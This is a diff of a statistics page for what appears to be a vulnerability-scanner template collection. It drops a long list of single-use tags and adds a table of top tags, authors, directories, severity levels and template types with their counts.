| -| teamwork | 1 | | | | | | | | | -| coinmarketcap | 1 | | | | | | | | | -| armemberplugin | 1 | | | | | | | | | -| alltrails | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| default-jwt | 1 | | | | | | | | | -| packetstrom | 1 | | | | | | | | | -| oauth2 | 1 | | | | | | | | | -| openwire | 1 | | | | | | | | | -| pokemonshowdown | 1 | | | | | | | | | -| cyberoamworks | 1 | | | | | | | | | -| ap-pricing-tables-lite | 1 | | | | | | | | | -| ncast | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| codebuild | 1 | | | | | | | | | -| rpcbind | 1 | | | | | | | | | -| paessler | 1 | | | | | | | | | -| shopex | 1 | | | | | | | | | -| license | 1 | | | | | | | | | -| europeana | 1 | | | | | | | | | -| whois | 1 | | | | | | | | | -| personal-dictionary | 1 | | | | | | | | | -| vampr | 1 | | | | | | | | | -| kkFileview | 1 | | | | | | | | | -| hanwang | 1 | | | | | | | | | -| ogugg | 1 | | | | | | | | | -| openv500 | 1 | | | | | | | | | -| geocaching | 1 | | | | | | | | | -| registrationmagic | 1 | | | | | | | | | -| nirweb-support | 1 | | | | | | | | | -| quttera | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| smartgateway | 1 | | | | | | | | | -| cf7skins | 1 | | | | | | | | | -| webgrind | 1 | | | | | | | | | -| front | 1 | | | | | | | | | -| benjamin | 1 | | | | | | | | | -| crystal | 1 | | | | | | | | | -| myfitnesspal-community | 1 | | | | | | | | | -| crontab | 1 | | | | | | | | | -| workresources | 1 | | | | | | | | | -| vagrant | 1 | | | | | | | | | -| ocomon_project | 1 | | | | | | | | | -| ansi_up_project | 1 | | | | | | | | | -| flyte | 1 | | | | | | | | | -| nextgen-gallery | 1 | | | | | | | | | -| jobmonster | 1 | | | | | | | | | -| talroo | 1 | | | | | | | | | -| ligeo | 1 | | | | | | | | | -| mypixs_project | 1 | | | | | | | | | -| danieljamesscott | 1 | | | | | | | | | -| stageshow_project | 1 | | | | | | | | | -| zwave | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| sock | 1 | | | | | | | | | -| joinmastodon | 1 | | | | | | | | | -| icearp | 1 | | | | | | | | | -| daybydaycrm | 1 | | | | | | | | | -| nosql | 1 | | | | | | | | | -| localize_my_post_project | 1 | | | | | | | | | -| webclient | 1 | | | | | | | | | -| mercusys | 1 | | | | | | | | | -| wpaffiliatemanager | 1 | | | | | | | | | -| gira | 1 | | | | | | | | | -| symmetricom | 1 | | | | | | | | | -| upward | 1 | | | | | | | | | -| a360inc | 1 | | | | | | | | | -| snapdrop | 1 | | | | | | | | | -| armorgames | 1 | | | | | | | | | -| plurk | 1 | | | | | | | | | -| fleet | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| alphaplug | 1 | | | | | | | | | -| pretty-url | 1 | | | | | | | | | -| dogtagpki | 1 | | | | | | | | | -| alma | 1 | | | | | | | | | -| scrapingdog | 1 | | | | | | | | | -| jasperserver | 1 | | | | | | | | | -| login-bypass | 1 | | | | | | | | | -| wpquery | 1 | | | | | | | | | -| cryptobox | 1 | | | | | | | | | -| openautomationsoftware | 1 | | | | | | | | | -| buddy | 1 | | | | | | | | | -| meduza-stealer | 1 | | | | | | | | | -| currencyfreaks | 1 | | | | | | | | | -| kindsoft | 1 | | | | | | | | | -| n8n | 1 | | | | | | | | | -| qvidium | 1 | | | | | | | | | -| pagerduty | 1 | | | | | | | | | -| redbubble | 1 | | | | | | | | | -| katz | 1 | | | | | | | | | -| incsub | 1 | | | | | | | | | -| global | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| collect_and_deliver_interface_for_woocommerce_project | 1 | | | | | | | | | -| librephotos | 1 | | | | | | | | | -| carrdco | 1 | | | | | | | | | -| directus | 1 | | | | | | | | | -| cve2000 | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| nessus | 1 | | | | | | | | | -| hackerearth | 1 | | | | | | | | | -| xenforo | 1 | | | | | | | | | -| clubhouse | 1 | | | | | | | | | -| authhttp | 1 | | | | | | | | | -| websitepanel | 1 | | | | | | | | | -| audiocode | 1 | | | | | | | | | -| awk | 1 | | | | | | | | | -| sisinformatik | 1 | | | | | | | | | -| atutor | 1 | | | | | | | | | -| chesscom | 1 | | | | | | | | | -| gnuboard5 | 1 | | | | | | | | | -| engage | 1 | | | | | | | | | -| php-proxy | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| parsi-font_project | 1 | | | | | | | | | -| eventum_project | 1 | | | | | | | | | -| ffserver | 1 | | | | | | | | | -| tunefind | 1 | | | | | | | | | -| onelogin | 1 | | | | | | | | | -| expressionalsocial-mastodon-instance | 1 | | | | | | | | | -| thorsten_riess | 1 | | | | | | | | | -| wp-cli | 1 | | | | | | | | | -| blipfm | 1 | | | | | | | | | -| dgtl | 1 | | | | | | | | | -| presspage | 1 | | | | | | | | | -| nagvis | 1 | | | | | | | | | -| fabswingers | 1 | | | | | | | | | -| flexnet | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| teradek | 1 | | | | | | | | | -| jupyterhub | 1 | | | | | | | | | -| m-files | 1 | | | | | | | | | -| championat | 1 | | | | | | | | | -| collibra | 1 | | | | | | | | | -| activeadmin | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| looneytunables | 1 | | | | | | | | | -| social-warfare | 1 | | | | | | | | | -| shadoweb | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| wpsmartcontracts | 1 | | | | | | | | | -| ccleaner | 1 | | | | | | | | | -| mastodon-mastodon | 1 | | | | | | | | | -| wiren | 1 | | | | | | | | | -| gigapan | 1 | | | | | | | | | -| tianqing | 1 | | | | | | | | | -| klogserver | 1 | | | | | | | | | -| wpovernight | 1 | | | | | | | | | -| homer | 1 | | | | | | | | | -| novus | 1 | | | | | | | | | -| ifunny | 1 | | | | | | | | | -| vr-calendar-sync | 1 | | | | | | | | | -| bower | 1 | | | | | | | | | -| acsoft | 1 | | | | | | | | | -| gist | 1 | | | | | | | | | -| cutesoft | 1 | | | | | | | | | -| multi_restaurant_table_reservation_system_project | 1 | | | | | | | | | -| asp.net | 1 | | | | | | | | | -| bws-updater | 1 | | | | | | | | | -| node-red | 1 | | | | | | | | | -| realor | 1 | | | | | | | | | -| csa | 1 | | | | | | | | | -| webtoprint | 1 | | | | | | | | | -| sharingsphere | 1 | | | | | | | | | -| aboutme | 1 | | | | | | | | | -| exposed | 1 | | | | | | | | | -| phpnow | 1 | | | | | | | | | -| forumprawneorg | 1 | | | | | | | | | -| secui | 1 | | | | | | | | | -| incomcms_project | 1 | | | | | | | | | -| broadcom | 1 | | | | | | | | | -| v2924 | 1 | | | | | | | | | -| viddler | 1 | | | | | | | | | -| ras | 1 | | | | | | | | | -| angularjs | 1 | | | | | | | | | -| com_janews | 1 | | | | | | | | | -| red-gate | 1 | | | | | | | | | -| orchardproject | 1 | | | | | | | | | -| my_calendar_project | 1 | | | | | | | | | -| woo-bulk-price-update | 1 | | | | | | | | | -| torify | 1 | | | | | | | | | -| polls-widget | 1 | | | | | | | | | -| containers | 1 | | | | | | | | | -| musiciansocial-mastodon-instance | 1 | | | | | | | | | -| sterling | 1 | | | | | | | | | -| jalios | 1 | | | | | | | | | -| tarantella | 1 | | | | | | | | | -| disabledrocks-mastodon-instance | 1 | | | | | | | | | -| user-management | 1 | | | | | | | | | -| media-library-assistant | 1 | | | | | | | | | -| register | 1 | | | | | | | | | -| pinkbike | 1 | | | | | | | | | -| skeb | 1 | | | | | | | | | -| run-parts | 1 | | | | | | | | | -| sabnzbd | 1 | | | | | | | | | -| rakefile | 1 | | | | | | | | | -| mixi | 1 | | | | | | | | | -| mapproxy | 1 | | | | | | | | | -| citybook | 1 | | | | | | | | | -| interactsoftware | 1 | | | | | | | | | -| smarterstats | 1 | | | | | | | | | -| weglot | 1 | | | | | | | | | -| nih | 1 | | | | | | | | | -| garage_management_system_project | 1 | | | | | | | | | -| prototype | 1 | | | | | | | | | -| buddypress | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| mdc_youtube_downloader_project | 1 | | | | | | | | | -| mojoauth | 1 | | | | | | | | | -| fark | 1 | | | | | | | | | -| raspberry | 1 | | | | | | | | | -| wpwax | 1 | | | | | | | | | -| joget | 1 | | | | | | | | | -| calendar | 1 | | | | | | | | | -| jinfornet | 1 | | | | | | | | | -| contact-form-entries | 1 | | | | | | | | | -| xanga | 1 | | | | | | | | | -| supportcandy | 1 | | | | | | | | | -| mesos | 1 | | | | | | | | | -| hrsale | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mojarra | 1 | | | | | | | | | -| hubpages | 1 | | | | | | | | | -| asciinema | 1 | | | | | | | | | -| mystrom | 1 | | | | | | | | | -| yelp | 1 | | | | | | | | | -| simple-image-manipulator_project | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| admzip | 1 | | | | | | | | | -| deimos | 1 | | | | | | | | | -| stytch | 1 | | | | | | | | | -| tripadvisor | 1 | | | | | | | | | -| simple-file-list | 1 | | | | | | | | | -| librespeed | 1 | | | | | | | | | -| bagisto | 1 | | | | | | | | | -| smartofficepayroll | 1 | | | | | | | | | -| mastodon-countersocial | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| sukebeinyaasi | 1 | | | | | | | | | -| ismygirl | 1 | | | | | | | | | -| skaut-bazar_project | 1 | | | | | | | | | -| iframe | 1 | | | | | | | | | -| powertek | 1 | | | | | | | | | -| home-assistant | 1 | | | | | | | | | -| cryptocurrencies | 1 | | | | | | | | | -| zatrybipl | 1 | | | | | | | | | -| modeldb | 1 | | | | | | | | | -| emulator | 1 | | | | | | | | | -| accent | 1 | | | | | | | | | -| hongjing | 1 | | | | | | | | | -| advancedcustomfields | 1 | | | | | | | | | -| visual-tools | 1 | | | | | | | | | -| csv | 1 | | | | | | | | | -| zero-spam | 1 | | | | | | | | | -| caldotcom | 1 | | | | | | | | | -| gzforum | 1 | | | | | | | | | -| sh | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| couch | 1 | | | | | | | | | -| xing | 1 | | | | | | | | | -| servmask | 1 | | | | | | | | | -| authorstream | 1 | | | | | | | | | -| ftp-backdoor | 1 | | | | | | | | | -| realtek | 1 | | | | | | | | | -| bonitasoft | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| payroll | 1 | | | | | | | | | -| julia | 1 | | | | | | | | | -| visocrea | 1 | | | | | | | | | -| looker | 1 | | | | | | | | | -| tvt | 1 | | | | | | | | | -| wp-ban | 1 | | | | | | | | | -| auru | 1 | | | | | | | | | -| xvideos-models | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| supremainc | 1 | | | | | | | | | -| homebridge | 1 | | | | | | | | | -| phacility | 1 | | | | | | | | | -| teradici | 1 | | | | | | | | | -| rantli | 1 | | | | | | | | | -| qualtrics | 1 | | | | | | | | | -| kanev | 1 | | | | | | | | | -| pahtool | 1 | | | | | | | | | -| the-plus-addons-for-elementor | 1 | | | | | | | | | -| go-ibax | 1 | | | | | | | | | -| metacritic | 1 | | | | | | | | | -| qmail | 1 | | | | | | | | | -| grandnode | 1 | | | | | | | | | -| thinkserver | 1 | | | | | | | | | -| cleanweb | 1 | | | | | | | | | -| liberty | 1 | | | | | | | | | -| iparapheur | 1 | | | | | | | | | -| motokiller | 1 | | | | | | | | | -| erigon | 1 | | | | | | | | | -| czepol | 1 | | | | | | | | | -| cars-seller-auto-classifieds-script_project | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| webasyst | 1 | | | | | | | | | -| maga-chat | 1 | | | | | | | | | -| simply-schedule-appointments | 1 | | | | | | | | | -| bws-testimonials | 1 | | | | | | | | | -| microservice | 1 | | | | | | | | | -| teamtreehouse | 1 | | | | | | | | | -| giters | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| browserweb | 1 | | | | | | | | | -| church_admin_project | 1 | | | | | | | | | -| livebos | 1 | | | | | | | | | -| reqlogic | 1 | | | | | | | | | -| everything | 1 | | | | | | | | | -| nytimes | 1 | | | | | | | | | -| visualshortcodes | 1 | | | | | | | | | -| webctrl | 1 | | | | | | | | | -| motioneye | 1 | | | | | | | | | -| edgemax | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| cube105 | 1 | | | | | | | | | -| exchangerateapi | 1 | | | | | | | | | -| houzz | 1 | | | | | | | | | -| easy-student-results | 1 | | | | | | | | | -| wsftp | 1 | | | | | | | | | -| istat | 1 | | | | | | | | | -| editor | 1 | | | | | | | | | -| karma_project | 1 | | | | | | | | | -| hydra | 1 | | | | | | | | | -| prvpl | 1 | | | | | | | | | -| nginxwebui | 1 | | | | | | | | | -| shoowbiz | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| dfgames | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| etoilewebdesign | 1 | | | | | | | | | -| crawler | 1 | | | | | | | | | -| interact | 1 | | | | | | | | | -| craft_cms | 1 | | | | | | | | | -| alcatel | 1 | | | | | | | | | -| swim_team_project | 1 | | | | | | | | | -| ticketmaster | 1 | | | | | | | | | -| epm | 1 | | | | | | | | | -| alkacon | 1 | | | | | | | | | -| aspnet | 1 | | | | | | | | | -| omni | 1 | | | | | | | | | -| taringa | 1 | | | | | | | | | -| researchgate | 1 | | | | | | | | | -| graphiql | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| quixplorer_project | 1 | | | | | | | | | -| sila | 1 | | | | | | | | | -| wl-500 | 1 | | | | | | | | | -| mailmap | 1 | | | | | | | | | -| eBridge | 1 | | | | | | | | | -| baseapp | 1 | | | | | | | | | -| skyscanner | 1 | | | | | | | | | -| issuu | 1 | | | | | | | | | -| i-plugins | 1 | | | | | | | | | -| petfinder | 1 | | | | | | | | | -| friendweb | 1 | | | | | | | | | -| foogallery | 1 | | | | | | | | | -| bigo-live | 1 | | | | | | | | | -| ulanzi | 1 | | | | | | | | | -| employee_records_system_project | 1 | | | | | | | | | -| gab | 1 | | | | | | | | | -| kotburger | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| koha | 1 | | | | | | | | | -| com-property | 1 | | | | | | | | | -| twig | 1 | | | | | | | | | -| jcms | 1 | | | | | | | | | -| osint-p2p | 1 | | | | | | | | | -| piratebay | 1 | | | | | | | | | -| oas | 1 | | | | | | | | | -| simple_task_managing_system_project | 1 | | | | | | | | | -| postcrossing | 1 | | | | | | | | | -| shardingsphere | 1 | | | | | | | | | -| web-suite | 1 | | | | | | | | | -| evernote | 1 | | | | | | | | | -| mix | 1 | | | | | | | | | -| fish | 1 | | | | | | | | | -| foursquare | 1 | | | | | | | | | -| jedox | 1 | | | | | | | | | -| liftoffsoftware | 1 | | | | | | | | | -| batflat | 1 | | | | | | | | | -| catchplugins | 1 | | | | | | | | | -| cron | 1 | | | | | | | | | -| reflected | 1 | | | | | | | | | -| chefio | 1 | | | | | | | | | -| smashballoon | 1 | | | | | | | | | -| alquistai | 1 | | | | | | | | | -| easyvista | 1 | | | | | | | | | -| tmdb | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| distcc | 1 | | | | | | | | | -| bimi | 1 | | | | | | | | | -| cowrie | 1 | | | | | | | | | -| nutanix | 1 | | | | | | | | | -| patriots-win | 1 | | | | | | | | | -| wechat_brodcast_project | 1 | | | | | | | | | -| codemiq | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| ccm | 1 | | | | | | | | | -| quiz | 1 | | | | | | | | | -| wpsolr | 1 | | | | | | | | | -| jorani_project | 1 | | | | | | | | | -| yourls | 1 | | | | | | | | | -| i-mscp | 1 | | | | | | | | | -| syfadis | 1 | | | | | | | | | -| cyberchef | 1 | | | | | | | | | -| vibilagare | 1 | | | | | | | | | -| ptr | 1 | | | | | | | | | -| payeezy | 1 | | | | | | | | | -| learning-management-system | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| aquasec | 1 | | | | | | | | | -| cd-action | 1 | | | | | | | | | -| thinvnc | 1 | | | | | | | | | -| dragonfly_project | 1 | | | | | | | | | -| blind-ssrf | 1 | | | | | | | | | -| softlimit | 1 | | | | | | | | | -| security | 1 | | | | | | | | | -| updraftplus | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| malshare | 1 | | | | | | | | | -| joomlashowroom | 1 | | | | | | | | | -| vultr | 1 | | | | | | | | | -| openethereum | 1 | | | | | | | | | -| zoomsounds | 1 | | | | | | | | | -| wp-video-gallery-free | 1 | | | | | | | | | -| officeserver | 1 | | | | | | | | | -| femtocell | 1 | | | | | | | | | -| icloud | 1 | | | | | | | | | -| emobile | 1 | | | | | | | | | -| helpdesk_pro_project | 1 | | | | | | | | | -| kanich | 1 | | | | | | | | | -| documentor_project | 1 | | | | | | | | | -| ssh-agent | 1 | | | | | | | | | -| easyen | 1 | | | | | | | | | -| xvideos-profiles | 1 | | | | | | | | | -| macaddresslookup | 1 | | | | | | | | | -| qibocms | 1 | | | | | | | | | -| age-gate | 1 | | | | | | | | | -| carbonmade | 1 | | | | | | | | | -| o2oa | 1 | | | | | | | | | -| viminfo | 1 | | | | | | | | | -| phpgedview | 1 | | | | | | | | | -| zbiornik | 1 | | | | | | | | | -| ics | 1 | | | | | | | | | -| nordpass | 1 | | | | | | | | | -| nodered | 1 | | | | | | | | | -| nsicg | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| magnussolution | 1 | | | | | | | | | -| wpb-show-core | 1 | | | | | | | | | -| defender-security | 1 | | | | | | | | | -| teamforge | 1 | | | | | | | | | -| magnusbilling | 1 | | | | | | | | | -| wordpress-country-selector | 1 | | | | | | | | | -| jbzd | 1 | | | | | | | | | -| producthunt | 1 | | | | | | | | | -| webp_converter_for_media_project | 1 | | | | | | | | | -| documentor-lite | 1 | | | | | | | | | -| kivicare-clinic-management-system | 1 | | | | | | | | | -| easyreport | 1 | | | | | | | | | -| ciphertrust | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| systeminformation | 1 | | | | | | | | | -| cudatel | 1 | | | | | | | | | -| binom | 1 | | | | | | | | | -| myblog | 1 | | | | | | | | | -| bws-xss | 1 | | | | | | | | | -| musicstore | 1 | | | | | | | | | -| microfinance | 1 | | | | | | | | | -| aflam | 1 | | | | | | | | | -| openhab | 1 | | | | | | | | | -| brighthr | 1 | | | | | | | | | -| htmlcoderhelper | 1 | | | | | | | | | -| winscp | 1 | | | | | | | | | -| openmage | 1 | | | | | | | | | -| bws-custom-search | 1 | | | | | | | | | -| ligeo-archives | 1 | | | | | | | | | -| helmet_store_showroom_site_project | 1 | | | | | | | | | -| properties | 1 | | | | | | | | | -| deployment | 1 | | | | | | | | | -| cups | 1 | | | | | | | | | -| yiboo | 1 | | | | | | | | | -| biotime | 1 | | | | | | | | | -| oahms | 1 | | | | | | | | | -| phonepe-payment-solutions | 1 | | | | | | | | | -| caldera | 1 | | | | | | | | | -| goodjob | 1 | | | | | | | | | -| pillowfort | 1 | | | | | | | | | -| ait-csv | 1 | | | | | | | | | -| super-socializer | 1 | | | | | | | | | -| lms | 1 | | | | | | | | | -| gogits | 1 | | | | | | | | | -| minds | 1 | | | | | | | | | -| ids | 1 | | | | | | | | | -| xinuos | 1 | | | | | | | | | -| bestbuy | 1 | | | | | | | | | -| vk | 1 | | | | | | | | | -| php_curl_class_project | 1 | | | | | | | | | -| olt | 1 | | | | | | | | | -| Microsoft | 1 | | | | | | | | | -| helpdesk | 1 | | | | | | | | | -| vmstio-mastodon-instance | 1 | | | | | | | | | -| zkoss | 1 | | | | | | | | | -| ultimate-weather_project | 1 | | | | | | | | | -| node-srv_project | 1 | | | | | | | | | -| b-elektro | 1 | | | | | | | | | -| easycorp | 1 | | | | | | | | | -| meilisearch | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| qwiz-online-quizzes-and-flashcards | 1 | | | | | | | | | -| orcusrat | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| seeyon-oa | 1 | | | | | | | | | -| taiwanese | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| taskrabbit | 1 | | | | | | | | | -| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | | -| flowci | 1 | | | | | | | | | -| phabricator | 1 | | | | | | | | | -| pdf-generator-for-wp | 1 | | | | | | | | | -| bookcrossing | 1 | | | | | | | | | -| discusssocial-mastodon-instance | 1 | | | | | | | | | -| pixelfedsocial | 1 | | | | | | | | | -| goodoldweb | 1 | | | | | | | | | -| codetipi | 1 | | | | | | | | | -| embed_swagger_project | 1 | | | | | | | | | -| nootheme | 1 | | | | | | | | | -| orcus | 1 | | | | | | | | | -| jgraph | 1 | | | | | | | | | -| dockerhub | 1 | | | | | | | | | -| couchsurfing | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| codesnippets | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| eleanor | 1 | | | | | | | | | -| wprssaggregator | 1 | | | | | | | | | -| coderwall | 1 | | | | | | | | | -| orbys | 1 | | | | | | | | | -| microsoft-technet-community | 1 | | | | | | | | | -| truth-social | 1 | | | | | | | | | -| wishlistr | 1 | | | | | | | | | -| sungrow | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| warriorforum | 1 | | | | | | | | | -| eventtickets | 1 | | | | | | | | | -| fusion | 1 | | | | | | | | | -| moonpay | 1 | | | | | | | | | -| message-me | 1 | | | | | | | | | -| tellonym | 1 | | | | | | | | | -| microcomputers | 1 | | | | | | | | | -| sensu | 1 | | | | | | | | | -| karma | 1 | | | | | | | | | -| stackhawk | 1 | | | | | | | | | -| linktap | 1 | | | | | | | | | -| lorsh-mastodon-instance | 1 | | | | | | | | | -| encompass | 1 | | | | | | | | | -| dapp | 1 | | | | | | | | | -| pluginops | 1 | | | | | | | | | -| 'updraftplus' | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| somansa | 1 | | | | | | | | | -| elasticpot | 1 | | | | | | | | | -| isams | 1 | | | | | | | | | -| greenbone | 1 | | | | | | | | | -| parse | 1 | | | | | | | | | -| pelco | 1 | | | | | | | | | -| lua | 1 | | | | | | | | | -| web-dorado | 1 | | | | | | | | | -| mediation | 1 | | | | | | | | | -| n-central | 1 | | | | | | | | | -| enrollment_system_project | 1 | | | | | | | | | -| clustering | 1 | | | | | | | | | -| affiliates-manager | 1 | | | | | | | | | -| planetestream | 1 | | | | | | | | | -| gpc | 1 | | | | | | | | | -| dynamic | 1 | | | | | | | | | -| pivotal_software | 1 | | | | | | | | | -| redux | 1 | | | | | | | | | -| pauple | 1 | | | | | | | | | -| vfs | 1 | | | | | | | | | -| vistaweb | 1 | | | | | | | | | -| markdown | 1 | | | | | | | | | -| paysyspro | 1 | | | | | | | | | -| h2c | 1 | | | | | | | | | -| accessally | 1 | | | | | | | | | -| senayan | 1 | | | | | | | | | -| topacm | 1 | | | | | | | | | -| bouqueteditor_project | 1 | | | | | | | | | -| modx | 1 | | | | | | | | | -| querysol | 1 | | | | | | | | | -| ilch | 1 | | | | | | | | | -| paramountplus | 1 | | | | | | | | | -| roundcube | 1 | | | | | | | | | -| behat | 1 | | | | | | | | | -| vcloud | 1 | | | | | | | | | -| pornhub-porn-stars | 1 | | | | | | | | | -| helprace | 1 | | | | | | | | | -| knowage | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| +| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | +| edb | 599 | theamanrawat | 223 | headless | 12 | | | | | +| rce | 599 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | +| packetstorm | 544 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| wpscan | 502 | gy741 | 158 | passive | 1 | | | | | +| cve2021 | 491 | righettod | 149 | cves.json | 1 | | | | | +| cve2022 | 479 | rxerium | 142 | | | | | | | +| wp | 426 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 380 | arafatansari | 118 | | | | | | | +| unauth | 367 | tess | 109 | | | | | | | +| sqli | 364 | pdresearch | 83 | | | | | | | +| file | 346 | iamnoooob | 69 | | | | | | | +| authenticated | 343 | idealphase | 66 | | | | | | | +| intrusive | 302 | madrobot | 65 | | | | | | | +| detect | 295 | zzeitlin | 64 | | | | | | | +| login | 284 | rootxharsh | 62 | | | | | | | +| kev | 275 | akincibor | 59 | | | | | | | +| cve2020 | 257 | for3stco1d | 55 | | | | | | | +| token-spray | 243 | philippedelteil | 53 | | | | | | | +| oast | 222 | johnk3r | 42 | | | | | | | +| config | 221 | edoardottt | 42 | | | | | | | +| default-login | 216 | gaurang | 42 | | | | | | | +| top-200 | 215 | j4vaovo | 35 | | | | | | | +| osint-social | 210 | c-sh0 | 35 | | | | | | | +| network | 195 | adam crosser | 31 | | | | | | | +| token | 193 | luisfelipe146 | 31 | | | | | | | +| apache | 191 | ice3man | 29 | | | | | | | +| | 191 | mastercho | 29 | | | | | | | +| devops | 177 | pwnhxl | 28 | | | | | | | +| cve2018 | 170 | organiccrap | 24 | | | | | | | +| iot | 167 | hardik-solanki | 24 | | | | | | | +| cve2019 | 164 | ctflearner | 23 | | | | | | | +| keys | 156 | harsh | 23 | | | | | | | +| joomla | 148 | techbrunchfr | 23 | | | | | | | +| install | 147 | userdehghani | 22 | | | | | | | +| malware | 142 | ffffffff0x | 22 | | | | | | | +| tcp | 136 | parthmalhotra | 20 | | | | | | | +| redirect | 135 | kazgangap | 19 | | | | | | | +| aws | 134 | cckuailong | 18 | | | | | | | +| cloud | 134 | sullo | 18 | | | | | | | +| auth-bypass | 133 | lu4nx | 17 | | | | | | | +| ssrf | 119 | bhutch | 17 | | | | | | | +| phishing | 117 | 0xpugazh | 16 | | | | | | | +| amazon | 117 | random-robbie | 16 | | | | | | | +| cms | 113 | shaikhyaser | 16 | | | | | | | +| files | 113 | unapibageek | 15 | | | | | | | +| cve2010 | 112 | pr3r00t | 15 | | | | | | | +| cve2017 | 110 | sheikhrishad | 15 | | | | | | | +| router | 108 | milo2012 | 14 | | | | | | | +| top-100 | 100 | dogasantos | 14 | | | | | | | +| aws-cloud-config | 90 | tenbird | 14 | | | | | | | +| disclosure | 89 | r3dg33k | 14 | | | | | | | +| linux | 85 | sharath | 13 | | | | | | | +| code | 81 | elsfa7110 | 13 | | | | | | | +| local | 80 | theabhinavgaur | 13 | | | | | | | +| cve2024 | 80 | nullfuzz | 13 | | | | | | | +| takeover | 79 | melbadry9 | 13 | | | | | | | +| seclists | 79 | 0ri2n | 13 | | | | | | | +| privesc | 79 | kazet | 12 | | | | | | | +| tokens | 78 | suman_kar | 12 | | | | | | | +| fileupload | 76 | meme-lord | 12 | | | | | | | +| oracle | 73 | wdahlenb | 11 | | | | | | | +| oss | 68 | cyllective | 11 | | | | | | | +| cisco | 67 | hackergautam | 10 | | | | | | | +| js | 67 | random_robbie | 10 | | | | | | | +| enum | 65 | logicalhunter | 10 | | | | | | | +| adobe | 63 | alph4byt3 | 10 | | | | | | | +| ir | 61 | nadino | 10 | | | | | | | +| huntr | 60 | 0x240x23elu | 10 | | | | | | | +| cve2015 | 59 | co5mos | 10 | | | | | | | +| atlassian | 59 | emadshanab | 9 | | | | | | | +| cve2016 | 57 | fabaff | 9 | | | | | | | +| detection | 56 | initstring | 9 | | | | | | | +| vmware | 56 | olearycrew | 9 | | | | | | | +| google | 56 | momika233 | 9 | | | | | | | +| c2 | 55 | oppsec | 9 | | | | | | | +| tenable | 48 | adamcrosser | 9 | | | | | | | +| logs | 48 | veshraj | 8 | | | | | | | +| log4j | 47 | noraj | 8 | | | | | | | +| vulhub | 46 | _0xf4n9x_ | 8 | | | | | | | +| hackerone | 46 | that_juan_ | 8 | | | | | | | +| aem | 45 | zh | 8 | | | | | | | +| osint-gaming | 45 | aashiq | 8 | | | | | | | +| php | 44 | irshad ahamed | 8 | | | | | | | +| cve2014 | 44 | iamthefrogy | 8 | | | | | | | +| debug | 44 | randomstr1ng | 7 | | | | | | | +| jndi | 44 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| deserialization | 43 | tarunkoyalwar | 7 | | | | | | | +| generic | 43 | nodauf | 7 | | | | | | | +| plugin | 42 | techryptic (@tech) | 7 | | | | | | | +| osint-hobby | 42 | kophjager007 | 7 | | | | | | | +| oa | 42 | harshbothra_ | 7 | | | | | | | +| traversal | 42 | leovalcante | 7 | | | | | | | +| osint-porn | 42 | huta0 | 7 | | | | | | | +| microsoft | 42 | caspergn | 7 | | | | | | | +| cnvd | 41 | dr_set | 7 | | | | | | | +| springboot | 41 | amit-jd | 7 | | | | | | 